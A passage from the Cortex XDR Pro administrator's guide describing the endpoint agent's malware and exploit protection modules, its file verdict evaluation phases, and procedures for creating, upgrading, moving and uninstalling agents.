Cortex XDR to detect malicious activity that could otherwise appear legitimate if inspected as individual
events. Behavioral threat protection requires Traps agent 6.0 or a later release.
• Evaluation of trusted signers—Permits unknown files that are signed by highly trusted signers to run on
the endpoint.
• Malware protection modules—Targets behaviors—such as those associated with ransomware—and
enables you to block the creation of child processes.
• Policy-based restrictions—Enables you to block files from executing from within specific local folders,
network folders, or external media locations.
• Periodic and automated scanning—Enables you to block dormant malware that has not yet tried to
execute on endpoints.
Malware Protection for Mac
• WildFire integration—Enables automatic detection of known malware and analysis of unknown malware
using WildFire threat intelligence.
• Local static analysis—Enables Cortex XDR to use machine learning to analyze unknown files and issue a
verdict. The Cortex XDR agent uses the verdict returned by the local analysis module until it receives the
WildFire verdict from Cortex XDR.
• Behavioral threat protection—Enables continuous monitoring of endpoint activity to identify and
analyze chains of events—known as causality chains. This enables the Cortex XDR agent to detect
malicious activity that could otherwise appear legitimate if inspected as individual events. Behavioral
threat protection requires Traps agent 6.1 or a later release.
• Mach-O file protection—Enables you to block known malicious and unknown mach-o files on Mac
endpoints.
• DMG file protection—Enables you to block known malicious and unknown DMG files on Mac endpoints.
• Evaluation of trusted signers—Permits unknown files that are signed by trusted signers to run on the
endpoint.
• Periodic and automated scanning—Enables you to block dormant malware that has not yet tried to
execute on endpoints. Scanning requires Cortex XDR agent 7.1 or a later release.
Malware Protection for Linux
• WildFire integration—Enables automatic detection of known malware and analysis of unknown malware
using WildFire threat intelligence. WildFire integration requires Traps agent 6.0 or a later release.
• Local static analysis—Enables the Cortex XDR agent to use machine learning to analyze unknown files
and issue a verdict. The Cortex XDR agent uses the verdict returned by the local analysis module until it
receives the WildFire verdict from Cortex XDR. Local analysis requires Traps agent 6.0 or a later release.
• Behavioral threat protection—Enables continuous monitoring of endpoint activity to identify and
analyze chains of events—known as causality chains. This enables Cortex XDR to detect malicious
activity that could otherwise appear legitimate if inspected as individual events. Behavioral threat
protection requires Traps agent 6.1 or a later release.
• ELF file protection—Enables you to block known malicious and unknown ELF files executed on a host
server or within a container on a Cortex XDR-protected endpoint. Cortex XDR automatically suspends
the file execution until a WildFire or local analysis verdict is obtained. ELF file protection requires Traps
agent 6.0 or a later release.
• Malware protection modules—Targets the execution behavior of a file—such as those associated with
reverse shell protection.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 75

© 2020 Palo Alto Networks, Inc.
 Malware Protection for Android
• WildFire integration—Enables automatic detection of known malware and grayware, and analysis of
unknown APK files using WildFire threat intelligence.
• APK files examination—Analyze and prevent malicious APK files from running.
• Evaluation of trusted signers—Permits unknown files that are signed by trusted signers to run on the
Android device.

File Analysis and Protection Flow

The Cortex XDR agent utilizes advanced multi-method protection and prevention techniques to protect
your endpoints from both known and unknown malware and software exploits.

Exploit Protection for Protected Processes

In a typical attack scenario, an attacker attempts to gain control of a system by first corrupting or bypassing
memory allocation or handlers. Using memory-corruption techniques, such as buffer overflows and heap
corruption, a hacker can trigger a bug in software or exploit a vulnerability in a process. The attacker must
then manipulate a program to run code provided or specified by the attacker while evading detection. If the
attacker gains access to the operating system, the attacker can then upload malware, such as Trojan horses
(programs that contain malicious executable files), or can otherwise use the system to their advantage. The
Cortex XDR agent prevents such exploit attempts by employing roadblocks—or traps—at each stage of an
exploitation attempt.

When a user opens a non-executable file, such as a PDF or Word document, and the process that opened
the file is protected, the Cortex XDR agent seamlessly injects code into the software. This occurs at the
earliest possible stage before any files belonging to the process are loaded into memory. The Cortex XDR
agent then activates one or more protection modules inside the protected process. Each protection module
targets a specific exploitation technique and is designed to prevent attacks on program vulnerabilities based
on memory corruption or logic flaws.
In addition to automatically protecting processes from such attacks, the Cortex XDR agent reports any
security events to Cortex XDR and performs additional actions as defined in the endpoint security policy.
Common actions that the Cortex XDR agent performs include collecting forensic data and notifying the user
about the event.
The default endpoint security policy protects the most vulnerable and most commonly used applications but
you can also add other third-party and proprietary applications to the list of protected processes.

76 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
Malware Protection
The Cortex XDR agent provides malware protection in a series of four evaluation phases:

Phase 1: Evaluation of Child Process Protection Policy

When a user attempts to run an executable, the operating system attempts to run the executable as a
process. If the process tries to launch any child processes, the Cortex XDR agent first evaluates the child
process protection policy. If the parent process is a known targeted process that attempts to launch a
restricted child process, the Cortex XDR agent blocks the child processes from running and reports the
security event to Cortex XDR. For example, if a user tries to open a Microsoft Word document (using the
winword.exe process) and that document has a macro that tries to run a blocked child process (such as
WScript), the Cortex XDR agent blocks the child process and reports the event to Cortex XDR. If the parent
process does not try to launch any child processes or tries to launch a child process that is not restricted,
the Cortex XDR agent next moves to Phase 2: Evaluation of the Restriction Policy.
Phase 2: Evaluation of the Restriction Policy
When a user or machine attempts to open an executable file, the Cortex XDR agent first evaluates the child
process protection policy as described in Phase 1: Evaluation of Child Process Protection Policy. The Cortex
XDR agent next verifies that the executable file does not violate any restriction rules. For example, you
might have a restriction rule that blocks executable files launched from network locations. If a restriction
rule applies to an executable file, the Cortex XDR agent blocks the file from executing and reports the
security event to Cortex XDR and, depending on the configuration of each restriction rule, the Cortex XDR
agent can also notify the user about the prevention event.
If no restriction rules apply to an executable file, the Cortex XDR agent next moves to Phase 3: Evaluation
of Hash Verdicts.
Phase 3: Hash Verdict Determination
The Cortex XDR agent calculates a unique hash using the SHA-256 algorithm for every file that attempts to
run on the endpoint. Depending on the features that you enable, the Cortex XDR agent performs additional
analysis to determine whether an unknown file is malicious or benign. The Cortex XDR agent can also
submit unknown files to Cortex XDR for in-depth analysis by WildFire.
To determine a verdict for a file, the Cortex XDR agent evaluates the file in the following order:

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 77

© 2020 Palo Alto Networks, Inc.
 1. Hash exception—A hash exception enables you to override the verdict for a specific file without
affecting the settings in your Malware Security profile. The hash exception policy is evaluated first and
takes precedence over all other methods to determine the hash verdict.
For example, you may want to configure a hash exception for any of the following situations:
• You want to block a file that has a benign verdict.
• You want to allow a file that has a malware verdict to run. In general, we recommend that you
only override the verdict for malware after you use available threat intelligence resources—such as
WildFire and AutoFocus—to determine that the file is not malicious.
• You want to specify a verdict for a file that has not yet received an official WildFire verdict.
After you configure a hash exception, Cortex XDR distributes it at the next heartbeat communication
with any endpoints that have previously opened the file.
When a file launches on the endpoint, the Cortex XDR agent first evaluates any relevant hash exception
for the file. The hash exception specifies whether to treat the file as malware. If the file is assigned a
benign verdict, the Cortex XDR agent permits it to open.
If a hash exception is not configured for the file, the Cortex XDR agent next evaluates the verdict to
determine the likelihood of malware. The Cortex XDR agent uses a multi-step evaluation process in
the following order to determine the verdict: Highly trusted signers, WildFire verdict, and then Local
analysis.
2. Highly trusted signers (Windows and Mac)—The Cortex XDR agent distinguishes highly trusted signers
such as Microsoft from other known signers. To keep parity with the signers defined in WildFire, Palo
Alto Networks regularly reviews the list of highly trusted and known signers and delivers any changes
with content updates. The list of highly trusted signers also includes signers that are included the
allow list from Cortex XDR. When an unknown file attempts to run, the Cortex XDR agent applies the
following evaluation criteria: Files signed by highly trusted signers are permitted to run and files signed
by prevented signers are blocked, regardless of the WildFire verdict. Otherwise, when a file is not signed
by a highly trusted signer or by a signer included in the block list, the Cortex XDR agent next evaluates
the WildFire verdict. For Windows endpoints, evaluation of other known signers takes place if WildFire
evaluation returns an unknown verdict for the file.
3. WildFire verdict—If a file is not signed by a highly trusted signer on Windows and Mac endpoints, the
Cortex XDR agent performs a hash verdict lookup to determine if a verdict already exists in its local
cache.
If the executable file has a malware verdict, the Cortex XDR agent reports the security event to the
Cortex XDR and, depending on the configured behavior for malicious files, the Cortex XDR agent then
does one of the following:
• Blocks the malicious executable file
• Blocks and quarantines the malicious executable file
• Notifies the user about the file but still allows the file to execute
• Logs the issue without notifying the user and allows the file to execute.
If the verdict is benign, the Cortex XDR agent moves on to the next stage of evaluation (see Phase 4:
Evaluation of Malware Protection Policy).
If the hash does not exist in the local cache or has an unknown verdict, the Cortex XDR agent next
evaluates whether the file is signed by a known signer.
4. Local analysis—When an unknown executable, DLL, or macro attempts to run on a Windows or
Mac endpoint, the Cortex XDR agent uses local analysis to determine if it is likely to be malware. On
Windows endpoints, if the file is signed by a known signer, the Cortex XDR agent permits the file to
run and does not perform additional analysis. For files on Mac endpoints and files that are not signed
by a known signer on Windows endpoints, the Cortex XDR agent performs local analysis to determine
whether the file is malware. Local analysis uses a static set of pattern-matching rules that inspect
multiple file features and attributes, and a statistical model that was developed with machine learning

78 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
 on WildFire threat intelligence. The model enables the Cortex XDR agent to examine hundreds of
characteristics for a file and issue a local verdict (benign or malicious) while the endpoint is offline or
Cortex XDR is unreachable. The Cortex XDR agent can rely on the local analysis verdict until it receives
an official WildFire verdict or hash exception.
Local analysis is enabled by default in a Malware Security profile. Because local analysis always returns a
verdict for an unknown file, if you enable the Cortex XDR agent to Block files with unknown verdict, the
agent only blocks unknown files if a local analysis error occurs or local analysis is disabled. To change the
default settings (not recommended), see Add a New Malware Security Profile.
Phase 4: Evaluation of Malware Security Policy
If the prior evaluation phases do not identify a file as malware, the Cortex XDR agent observes the behavior
of the file and applies additional malware protection rules. If a file exhibits malicious behavior, such as
encryption-based activity common with ransomware, the Cortex XDR agent blocks the file and reports the
security event to the Cortex XDR.
If no malicious behavior is detected, the Cortex XDR agent permits the file (process) to continue running but
continues to monitor the behavior for the lifetime of the process.

Endpoint Protection Capabilities

Each security profile provides a tailored list of protection capabilities that you can configure for the
platform you select. The following table describes the protection capabilities you can customize in a security
profile. The table also indicates which platforms support the protection capability (a dash (—) indicates the
capability is not supported).

Protection Capability Windows Mac Linux Android

Exploit Security Profiles

Browser Exploits Protection — —

Browsers can be subject to exploitation
attempts from malicious web pages
and exploit kits that are embedded in
compromised websites. By enabling
this capability, the Cortex XDR agent
automatically protects browsers from
common exploitation attempts.

Logical Exploits Protection — —

Attackers can use existing mechanisms
in the operating system—such as DLL-
loading processes or built in system
processes—to execute malicious code.
By enabling this capability, the Cortex
XDR agent automatically protects
endpoints from attacks that try to
leverage common operating system
mechanisms for malicious purposes.

Known Vulnerable Processes Protection —

Common applications in the operating
system, such as PDF readers, Office
applications, and even processes that

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 79

© 2020 Palo Alto Networks, Inc.
 Protection Capability Windows Mac Linux Android
are a part of the operating system itself
can contain bugs and vulnerabilities
that an attacker can exploit. By enabling
this capability, the Cortex XDR agent
protects these processes from attacks
which try to exploit known process
vulnerabilities.

Exploit Protection for Additional —

Processes
To extend protection to third-party
processes that are not protected by
the default policy from exploitation
attempts, you can add additional
processes to this capability.

Operating System Exploit Protection —

Attackers commonly leverage the
operating system itself to accomplish
a malicious action. By enabling this
capability, the Cortex XDR agent
protects operating system mechanisms
such as privilege escalation and prevents
them from being used for malicious
purposes.

Malware Security Profiles

Behavioral Threat Protection —

Prevents sophisticated attacks that
leverage built-in OS executables and
common administration utilities by
continuously monitoring endpoint
activity for malicious causality chains.

Ransomware Protection — — —
Targets encryption based activity
associated with ransomware to analyze
and halt ransomware before any data
loss occurs.

Prevent Malicious Child Process — — —

Execution
Prevents script-based attacks used to
deliver malware by blocking known
targeted processes from launching child
processes commonly used to bypass
traditional security approaches.

Portable Executables and DLLs — — —

Examination

80 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
Protection Capability Windows Mac Linux Android
Analyze and prevent malicious
executable and DLL files from running.

ELF Files Examination — — —

Analyze and prevent malicious ELF files
from running.

Local File Threat Examination — — —

Analyze and quarantine malicious PHP
files arriving from the web server.

Office Files Examination — — —

Analyze and prevent malicious macros
embedded in Microsoft Office files from
running.

Mach-O Files Examination — — —

Analyze and prevent malicious mach-o
files from running.

DMG Files Examination — — —

Analyze and prevent malicious DMG
files from running.

APK Files Examination — — —

Analyze and prevent malicious APK files
from running.

Reverse Shell Protection — — —

Detect suspicious or abnormal network
activity from shell processes and
terminate the malicious shell process.

Restrictions Security Profiles

Execution Paths — — —
Many attack scenarios are based on
writing malicious executable files to
certain folders such as the local temp
or download folder and then running
them. Use this capability to restrict the
locations from which executable files
can run.

Network Locations — — —
To prevent attack scenarios that are
based on writing malicious files to
remote folders, you can restrict access

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 81

© 2020 Palo Alto Networks, Inc.
 Protection Capability Windows Mac Linux Android
to all network locations except for those
that you explicitly trust.

Removable Media — — —
To prevent malicious code from gaining
access to endpoints using external media
such as a removable drive, you can
restrict the executable files, that users
can launch from external drives attached
to the endpoints in your network.

Optical Drive — — —
To prevent malicious code from gaining
access to endpoints using optical disc
drives (CD, DVD, and Blu-ray), you
can restrict the executable files, that
users can launch from optical disc drives
connected to the endpoints in your
network.

Endpoint Protection Modules

Each security profile applies multiple security modules to protect your endpoints from a wide range of
attack techniques. While the settings for each module are not configurable, the Cortex XDR agent activates
a specific protection module depending on the type of attack, the configuration of your security policy, and
the operating system of the endpoint. When a security event occurs, the Cortex XDR agent logs details
about the event including the security module employed by the Cortex XDR agent to detect and prevent
the attack based on the technique. To help you understand the nature of the attack, the alert identifies the
protection module the Cortex XDR agent employed.
The following table lists the modules and the platforms on which they are supported. A dash (—) indicates
the module is not supported.

Module Windows Mac Linux Android

Anti-Ransomware — — —
Targets encryption-based
activity associated with
ransomware and has the
ability to analyze and
halt ransomware activity
before any data loss
occurs.

APC Protection — — —
Prevents attacks that
change the execution
order of a process
by redirecting an

82 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
Module Windows Mac Linux Android
asynchronous procedure
call (APC) to point to the
malicious shellcode.

Behavioral Threat —
Prevents sophisticated
attacks that leverage
built-in OS executables
and common
administration utilities by
continuously monitoring
endpoint activity for
malicious causality chains.

Brute Force Protection — — —

Prevents attackers
from hijacking the
process control flow
by monitoring memory
layout enumeration
attempts.

Child Process Protection — — —

Prevents script-based
attacks that are used
to deliver malware,
such as ransomware, by
blocking known targeted
processes from launching
child processes that
are commonly used to
bypass traditional security
approaches.

CPL Protection — — —
Protects against
vulnerabilities related to
the display routine for
Windows Control Panel
Library (CPL) shortcut
images, which can be used
as a malware infection
vector.

Data Execution — — —
Prevention (DEP)
Prevents areas of memory
defined to contain
only data from running
executable code.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 83

© 2020 Palo Alto Networks, Inc.
 Module Windows Mac Linux Android

DLL Hijacking — — —
Prevents DLL-hijacking
attacks where the
attacker attempts to load
dynamic-link libraries
on Windows operating
systems from unsecure
locations to gain control
of a process.

DLL Security — — —
Prevents access to crucial
DLL metadata from
untrusted code locations.

Dylib Hijacking — — —
Prevents Dylib-hijacking
attacks where the
attacker attempts to load
dynamic libraries on Mac
operating systems from
unsecure locations to gain
control of a process.

Exploit Kit Fingerprint — — —

Protects against the
fingerprinting technique
used by browser
exploit kits to identify
information—such as the
OS or applications which
run on an endpoint—that
attackers can leverage
when launching an attack
to evade protection
capabilities.

Font Protection — — —
Prevents improper font
handling, a common
target of exploits.

Gatekeeper Enhancement — — —
Enhances the macOS
gatekeeper functionality
that allows apps to run
based on their digital
signature. This module
provides an additional

84 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
Module Windows Mac Linux Android
layer of protection by
extending gatekeeper
functionality to child
processes so you can
enforce the signature
level of your choice.

Hash Exception
Halts execution of files
that an administrator
identified as malware
regardless of the WildFire
verdict.

Hot Patch Protection — — —

Prevents the use of
system functions
to bypass DEP and
address space layout
randomization (ASLR).

Java Deserialization — — —
Blocks attempts to
execute malicious code
during the Java objects
deserialization process on
Java-based servers.

JIT — —
Prevents an attacker
from bypassing the
operating system's
memory mitigations
using just-in-time (JIT)
compilation engines.

Kernel Integrity Monitor — — —

(KIM)
Prevents rootkit and
vulnerability exploitation
on Linux endpoints.
On the first detection
of suspicious rootkit
behavior, the behavioral
threat protection (BTP)
module generates an
XDR Agent alert. Cortex
XDR stitches logs about
the process that loaded
the kernel module with

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 85

© 2020 Palo Alto Networks, Inc.
 Module Windows Mac Linux Android
other logs relating to
the kernel module to aid
in alert investigation.
When the Cortex XDR
agent detects subsequent
rootkit behavior, it blocks
the activity.

Local Analysis —
Examines hundreds of
characteristics of an
unknown executable
file, DLL, or macro to
determine if it is likely
to be malware. The local
analysis module uses
a static set of pattern-
matching rules that
inspect multiple file
features and attributes,
and a statistical model
that was developed
using machine learning
on WildFire threat
intelligence.

Local Threat Evaluation — — —

Engine (LTEE)
Protects against malicious
PHP files arriving from the
web server.

Local Privilege Escalation —

Protection
Prevents attackers from
performing malicious
activities that require
privileges that are higher
than those assigned to
the attacked or malicious
process.

Null Dereference — — —
Prevents malicious code
from mapping to address
zero in the memory space,
making null dereference
vulnerabilities
unexploitable.

86 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
Module Windows Mac Linux Android

Restricted Execution - — — —
Local Path
Prevents unauthorized
execution from a local
path.

Restricted Execution - — — —
Network Location
Prevents unauthorized
execution from a network
path.

Restricted Execution - — — —
Removable Media
Prevents unauthorized
execution from removable
media.

Reverse Shell Protection — — —

Blocks malicious activity
where an attacker
redirects standard input
and output streams to
network sockets.

ROP —
Protects against the
use of return-oriented
programming (ROP) by
protecting APIs used in
ROP chains.

SEH — — —
Prevents hijacking
of the structured
exception handler (SEH),
a commonly exploited
control structure that
can contain multiple SEH
blocks that form a linked
list chain, which contains
a sequence of function
records.

Shellcode Protection — — —
Reserves and protects
certain areas of memory
commonly used to house

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 87

© 2020 Palo Alto Networks, Inc.
 Module Windows Mac Linux Android
payloads using heap spray
techniques.

ShellLink — — —
Prevents shell-link logical
vulnerabilities.

SO Hijacking Protection — — —
Prevents dynamic loading
of libraries from unsecure
locations to gain control
of a process.

SysExit — — —
Prevents using system
calls to bypass other
protection capabilities.

UASLR — — —
Improves or altogether
implements ASLR
(address space layout
randomization) with
greater entropy,
robustness, and strict
enforcement.

Vulnerable Drivers — — —
Protection
Detect attempts to load
vulnerable drivers.

WildFire
Leverages WildFire for
threat intelligence to
determine whether a file
is malware. In the case
of unknown files, Cortex
XDR can forward samples
to WildFire for in-depth
analysis.

WildFire Post-Detection
(Malware and Grayware)
Identifies a file that
was previously allowed
to run on an endpoint
that is now determined
to be malware. Post-

88 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
Module Windows Mac Linux Android
detection events provide
notifications for each
endpoint on which the file
executed.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 89

© 2020 Palo Alto Networks, Inc.
Manage Cortex XDR Agents
• Create an Agent Installation Package
• Set an Application Proxy for Cortex XDR Agents
• Move Cortex XDR Agents Between Managing XDR Servers
• Upgrade Cortex XDR Agents
• Delete Cortex XDR Agents
• Uninstall the Cortex XDR Agent
• Set an Alias for an Endpoint

Create an Agent Installation Package

To install the Cortex XDR agent on the endpoint for the first time, you must first create an agent installation
package. After you create and download an installation package, you can then install it directly on an
endpoint or you can use a software deployment tool of your choice to distribute the software to multiple
endpoints. To install the Cortex XDR agent, you must use a valid installation package that exists in your
Cortex XDR management console. If you delete an installation package, any agents installed from this
package are not able to register to Cortex XDR.
After you install the Cortex XDR agent for the first time, you can upgrade individual or batches of agents
remotely from the Cortex XDR management console.
To create a new installation package:

STEP 1 | From Cortex XDR, select Endpoints > Endpoint Management > Agent Installations.

STEP 2 | Create a new installation package.

90 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
STEP 3 | Enter a unique Name and an optional Description to identify the installation package.
The package Name must be no more than 100 characters and can contain letters, numbers, hyphens,
underscores, commas, and spaces.

STEP 4 | Select the Package Type.

• Standalone Installers—Use for fresh installations and to Upgrade Cortex XDR Agents on a registered
endpoint that is connected to Cortex XDR.
• (Windows, macOS, and Linux only) Upgrade from ESM—Use this package to upgrade Traps agents
which connect to the on-premise Traps Endpoint Security Manager to Cortex XDR.

STEP 5 | Select the Platform for which you want to create the installation package.

STEP 6 | (Windows, macOS, and Linux only) Select the Agent Version for the package.

STEP 7 | Create the installation package.

Cortex XDR prepares your installation package and makes it available on the Agent Installations page.

STEP 8 | Download your installation package.

When the status of the package shows Completed, right-click the agent version, and click Download.
• For Windows endpoints, select between the architecture type.
• For macOS endpoints, download the ZIP installation folder and upload it to the endpoint. To deploy
the Cortex XDR agent using JAMF, upload the ZIP folder to JAMF. Alternatively, to install the agent
manually on the endpoint, unzip the ZIP folder and double-click the pkg file.
• For Linux endpoints, you can download .rpm or .deb installers (according to the endpoint
Linux distribution), and deploy the installers on the endpoints using the Linux package manager.
Alternatively, you can download a Shell installer and deploy it manually on the endpoint.

When you upgrade a Cortex XDR agent version without package manager, Cortex
XDR will upgrade the installation process to package manager by default, according to
the endpoint Linux distribution.
• For Android endpoints, Cortex XDR creates a tenant-specific download link which you can distribute
to Android endpoints. When a newer agent version is available, Cortex XDR identifies older package
versions as [Outdated].

STEP 9 | Next steps:

As needed, you can return to the Agent Installations page to manage your agent installation packages.
To manage a specific package, right click the agent version, and select the desired action:
• Edit the package name or description.
• Delete the installation package. Deleting an installation package does not uninstall the Cortex XDR
agent software from any endpoints.

Since Cortex XDR relies on the installation package ID to approve agent registration
during install, it is not recommended to delete the installation package of active
endpoints. If you install the Cortex XDR agent from a package after you delete it,
Cortex XDR denies the registration request leaving the agent in an unprotected
state. Hiding the installation package will remove it from the default list of available
installation packages, and can be useful to eliminate confusion within the management
console main view. These hidden installation can be viewed by removing the default
filter.
• Copy text to clipboard to copy the text from a specific field in the row of an installation package.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 91

© 2020 Palo Alto Networks, Inc.
 • Hide installation packages. Using the Hide option provides a quick method to filter out results based
on a specific value in the table. You can also use the filters at the top of the page to build a filter from
scratch. To create a persistent filter, save ( ) it.

Set an Application Proxy for Cortex XDR Agents

This capability is supported on endpoints with Traps agent 5.0.9 (Windows only) or Cortex
XDR agent 7.0 and later releases.

In environments where agents communicate with the Cortex XDR server through a wide-system proxy,
you can now set an application-specific proxy for the Traps and Cortex XDR agent without affecting the
communication of other applications on the endpoint. You can set the proxy in one of three ways: during
the agent installation or after installation using Cytool on the endpoint or from Endpoints Management
in Cortex XDR as described in this topic. You can assign up to five different proxy servers per agent.
The proxy server the agent uses is selected randomly and with equal probability. If the communication
between the agent and the Cortex XDR sever through the app-specific proxies fails, the agent resumes
communication through the system-wide proxy defined on the endpoint. If that fails as well, the agent
resumes communication with Cortex XDR directly.

STEP 1 | From Cortex XDR, select Endpoints > Endpoint Management > Endpoint Administration.

STEP 2 | If needed, filter the list of endpoints.

STEP 3 | Set an agent proxy.

1. Select the row of the endpoint for which you want to set a proxy.
2. Right-click the endpoint and select Endpoint Control > Set Endpoint Proxy.

3. You can assign up to five different proxies per agent. For each proxy, enter the IP address and port
number. For Cortex XDR agents 7.2.1 and later, you can also configure the proxy by entering the
FQDN and port number. When you enter the FQDN, you can use either all lowercase letters or all
uppercase letters. Avoid using special characters or spaces.
For example: my.network.name:808,YOUR.NETWORK.COM:888,10.196.20.244:8080.
4. Set when you’re done.
5. If necessary, you can later Disable Endpoint Proxy from the right-click menu.
When you disable the proxy configuration, all proxies associated with that agent are removed. The
agent resumes communication with the Cortex XDR sever through the wide-system proxy if defined,
otherwise if a wide-system is not defined the agent resumes communicating directly with the Cortex
XDR server. If neither a wide-system proxy nor direct communication exist and you disable the proxy,
the agent will disconnect from Cortex XDR.

92 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
Move Cortex XDR Agents Between Managing XDR Servers
You can move existing agents between Cortex XDR managing servers directly from the Cortex XDR
management console. This can be useful during POCs or to better manage your agents allocation between
tenants. When you change the server that manages the agent, the agent transfers to the new managing
server as a freshly installed agent, without any data that was previously stored for it on the original
managing server. After the Cortex XDR registers with the new server, it can no longer communicate with
the previous one.
The following are prerequisites to enable you change the managing server of a Cortex XDR agent:
• Ensure that you are running a Cortex XDR agent 7.2 or later release.
• Ensure you have administrator privileges for Cortex XDR in the hub.
To register to another managing server, the Cortex XDR agent requires a distribution ID of an installation
package on the target server in order to identify itself as a valid Cortex XDR agent. The agent must provide
an ID of an installation package that matches the same operating system and for the same or a previous
agent version. For example, if you want to move a Cortex XDR Agent 7.0.2 for Windows, you can select
from the target managing server the ID of an installation package created for a Cortex XDR Agent 5.0.0 for
Windows. The operating system version can be different.
To change the managing server of a Cortex XDR Agent:

STEP 1 | Obtain an installation package ID from the target managing server.

1. Log in to Cortex XDR on the target management server, then navigate to Endpoints > Endpoint
Management > Agent Installations.
2. From the agent installations table, locate a valid installation package you can use to register the
agent. Alternatively, you can create a new installation package if required.
3. Right-click the ID field and copy the value. Save this value, you will need it later for the registration
process. If the ID column is not displayed in the table, add it.

STEP 2 | Locate the Cortex XDR agent you want to move.

Log in the current managing server of the Cortex XDR agent and navigate to Endpoints > Endpoint
Management > Endpoints Administration.

STEP 3 | Change the managing server.

1. Select one or more agents that you want to move to the target server.
2. Right click + Alt to open the options menu in advanced mode, and select Endpoint Control > Change
managing server. This option is available only for an administrator in Cortex XDR and for Cortex XDR
agent 7.2 and later releases.

3. Enter the ID number of the installation package you obtained in Step 1. If you selected agents
running on different operating systems, for example Windows and Linux, you must provide an ID for
each operating system. When done, click Move.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 93

© 2020 Palo Alto Networks, Inc.
STEP 4 | Track the action.
When you track the action in the Action Center, the original managing server will keep displaying In
progress (Sent) status also after the action has ended successfully, since the agent no longer reports to
this managing server. The new managing server will add this as a new agent registration action.

Upgrade Cortex XDR Agents

After you install the Cortex XDR agent and the agent registers with Cortex XDR, you can upgrade the
Cortex XDR agent software using a method supported by the endpoint platform:
• Android—Upgrade the app directly from the Google Play Store or push the app to your endpoints from
an endpoint management system such as AirWatch.
• Windows, Mac, or Linux—Create new installation packages and push the Cortex XDR agent package to
up to 5,000 endpoints from Cortex XDR.

You cannot upgrade VDI endpoints. Additionally, you cannot upgrade a Golden Image
from Cortex XDR agent 6.1.x or an earlier release to a Cortex XDR agent 7.1.0 or a later
release.
Upgrades are supported using actions which you can initiate from the Action Center or from Endpoint
Administration as described in this workflow.

STEP 1 | Create an Agent Installation Package for each operating system version for which you want to
upgrade the Cortex XDR agent.
Note the installation package names.

STEP 2 | Select Endpoints > Endpoint Management.

If needed, filter the list of endpoints. To reduce the number of results, use the endpoint name search and
filters Filters at the top of the page.

STEP 3 | Select the endpoints you want to upgrade.

You can also select endpoints running different operating systems to upgrade the agents at the same
time.

STEP 4 | Right-click your selection and select Endpoint Control > Upgrade agent version.

94 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
 For each platform, select the name of the installation package you want to push to the selected
endpoints.
Starting in the Cortex XDR agent 7.1 release, you can install the Cortex XDR agent on Linux endpoints
using package manager. When you upgrade an agent on a Linux endpoint that is not using package
manager, Cortex XDR upgrades the installation process by default according to the endpoint Linux
distribution. Alternatively, if you do not want to use the package manage, clear the option Upgrade to
installation by package manager.

The Cortex XDR agent keeps the name of the original installation package after every
upgrade.

STEP 5 | Upgrade.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 95

© 2020 Palo Alto Networks, Inc.
 Cortex XDR distributes the installation package to the selected endpoints at the next heartbeat
communication with the agent. To monitor the status of the upgrades, go to Response > Action Center.
From the Action Center you can also view additional information about the upgrade (right-click the
action and select Additional data) or cancel the upgrade (right-click the action and select Cancel Agent
Upgrade).

• During the upgrade process, the endpoint operating system might request for a reboot.
However, you do not have to perform the reboot for the Cortex XDR agent upgrade
process to complete successfully.
• After you upgrade to a Cortex XDR agent 7.2 or a later release on an endpoint with
Cortex XDR Device Control rules, you need to reboot the endpoint for the rules to take
effect.

Delete Cortex XDR Agents

From Cortex XDR, you can delete a Cortex XDR agent from one or more Windows, Mac, or Linux endpoints
that have disconnected from the Cortex XDR management console. Deleting an endpoint triggers the
following lifespan flow:
• Standard agents are deleted after 180 days of inactivity.
• VDI and TS agents are deleted after 6 hours of inactivity.

To reinstate an endpoint, you have to uninstall and reinstall the endpoint.

After an endpoint is deleted, data associated with the deleted endpoint is displayed in the Action Center
tables and in the Causality View with am Endpoint Name - N/A (Endpoint Deleted). Alerts that
already include the endpoint data at the time of the alert creation are not affected.
The following workflow describes how to delete the Cortex XDR agent from one or more Windows, Mac, or
Linux endpoints.

STEP 1 | Select Endpoints > Endpoint Management > Endpoint Administration.

STEP 2 | Right-click the endpoint you want to remove.

You can also select multiple endpoints if you want to perform a bulk delete.

STEP 3 | Select Endpoint Control > Delete Endpoint.

Uninstall the Cortex XDR Agent

From Cortex XDR, you can uninstall the Cortex XDR agent from one or more Windows, Mac, or Linux
endpoints at any time. You can uninstall the Cortex XDR agent from an unlimited number of endpoints in a
single bulk action. To uninstall the Cortex XDR app for Android, you must do so from the Android endpoint.
The following workflow describes how to uninstall the Cortex XDR agent from one or more Windows, Mac,
or Linux endpoints.

STEP 1 | Log in to Cortex XDR.

Go to Response > Action Center > + New Action.

STEP 2 | Select Agent Uninstall.

